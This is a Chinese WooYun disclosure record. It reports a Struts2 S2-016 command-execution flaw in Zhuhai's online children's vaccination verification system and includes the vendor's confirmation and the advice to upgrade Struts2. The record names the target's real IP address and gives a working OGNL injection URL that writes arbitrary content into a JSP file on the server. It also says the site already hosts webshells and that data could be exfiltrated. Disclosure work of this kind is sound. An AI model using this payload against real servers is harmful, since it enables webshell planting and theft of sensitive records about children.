当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095657

漏洞标题:珠海市儿童预防接种网上查验证系统存在s2-016漏洞 已成马场

相关厂商:珠海市疾病预防控制中心

漏洞作者: Code_Monkey

提交时间:2015-02-05 16:29

修复时间:2015-03-22 16:30

公开时间:2015-03-22 16:30

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-05: 细节已通知厂商并且等待厂商处理中
2015-02-10: 厂商已经确认,细节仅向厂商公开
2015-02-20: 细节向核心白帽子及相关领域专家公开
2015-03-02: 细节向普通白帽子公开
2015-03-12: 细节向实习白帽子公开
2015-03-22: 细节向公众公开

简要描述:

该系统由珠海智特电子开发, 家长和学校都可登陆查询儿童的预防接种情况,并可自助打印验证表。验证表自带电子章,家长打印后即可用以报名,学校可通过系统核对。

详细说明:

漏洞证明:

初步验证:

http://121.10.253.39:8089/olas/forwardpages/appuseraation!cdclogin.action?redirect:http://www.wooyun.org


文件上传:

http://121.10.253.39:8089/olas/forwardpages/appuseraation!cdclogin.action?redirect:${ %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22css.jsp%22).replaceAll("\\\\","/"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=Hello WooYun!


文件上传.png


马场:

马场.png


好多数据可以被拖走的样子.

QQ截图20150204174947.png

修复方案:

升级Struts2或者打补丁.

版权声明:转载请注明来源 Code_Monkey@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-02-10 09:05

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无